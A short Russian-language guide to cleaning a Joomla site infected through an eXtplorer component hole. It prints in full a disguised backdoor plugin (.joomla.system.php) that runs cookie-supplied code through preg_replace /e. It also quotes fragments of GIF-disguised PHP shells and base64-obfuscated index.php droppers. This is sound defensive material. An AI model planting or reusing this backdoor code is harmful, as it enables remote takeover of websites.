Зловред попадает на сайт через уязвимость в компоненте eXtplorer и осуществляет рассылку спама. Уязвимость устранена в версии компонента 2.1.5.
В структуре сайта, в частности в папке /images/stories/ появляется множество файлов .gif и .php с сгенерированными названиями, если открыть их текстовым редактором увидим php код:
GIF89a1 <?php if (isset($_REQUEST['p1'])) // и так далее
код файла начинается с GIF89a1, что свидетельствует о том, что файл изначально был залит как изображение формата .gif.
Находим в папке /plugins/ файл .joomla.system.php, следующего содержания:
<?php
/**
* @package Joomla.Plugin
* @since 1.5
*/
class PlgSystemJoomla {
public function __construct() {
$file=@$_COOKIE['Jlm3'];
if ($file){
$opt = $file(@$_COOKIE['Jlm2']);
$au = $file(@$_COOKIE['Jlm1']);
$opt("/585/e",$au,585);
die(); }}}
$index = new PlgSystemJoomla;
Именно с него начинается заражение.
Далее вычищаем все подозрительные изображения с расширением .gif и файлы .php с такими же названиями из папки /images/ и подпапок и из корня сайта.
Внимание! не удалите по ошибке системные файлы index.php
Так же необходимо найти и удалить файлы index.php во всех папках сайта, с содержимым, похожим на:
<?
//большое количество отступов base64_decode("строка в base64==');
?>